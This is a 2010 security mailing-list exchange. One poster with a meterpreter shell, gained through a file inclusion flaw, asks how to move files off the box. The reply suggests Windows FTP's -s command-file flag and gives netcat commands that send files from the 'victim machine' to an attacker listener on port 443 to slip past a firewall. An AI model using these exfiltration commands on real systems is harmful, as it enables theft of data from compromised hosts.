Re: Non Interactive Shell

[Robert Portvliet <robert.portvliet () gmail com>]

It's likely because you only have shell access. If you don't have terminal
access (like ssh or telnet) you won't be able to use any of the interactive
commands, such as FTP or any other command which will prompt you for some
type of input.

One way to get around this with FTP is that FTP (under windows, at least)
supports the -s flag which let's you pass it a list of commands in a file,
one per line. You can use this to pass it all the commands needed to
transfer files.

As for netcat, you can set up a listener on your attack machine like so 'nc
-lp 443 > my_outfile' and a client on the victim machine like so ' nc -vn
192.168.1.100 443 < my_infile' and shovel your files out that way. This will
most likely get around your firewall woes..


Cheers,

Rob

On Wed, Nov 3, 2010 at 9:31 AM, Craig Freyman <craigfreyman () gmail com>wrote:

> I'm using a php/meterpreter with a box that has an RFI. When I drop into a
> shell using execute -f /bin/bash -i   I can run commands but it appears it
> is non interactive. For example, when I type "ftp" I'm not prompted with
> anything, however if I type ftp -h I see all the help options. I tried
> creating a text file that has all the FTP commands I want to execute but
> there isn't a way to tell the ftp client to use the text file. I've also
> tried using netcat to transfer files but the local box must be using IP
> tables because I can never connect to the remote port. Anyone have any hints
> as to how I can transfer files between these two boxes?
>
> Thanks,
> Craig
>
> _______________________________________________
> Pauldotcom mailing list
> Pauldotcom () mail pauldotcom com
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com



--

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com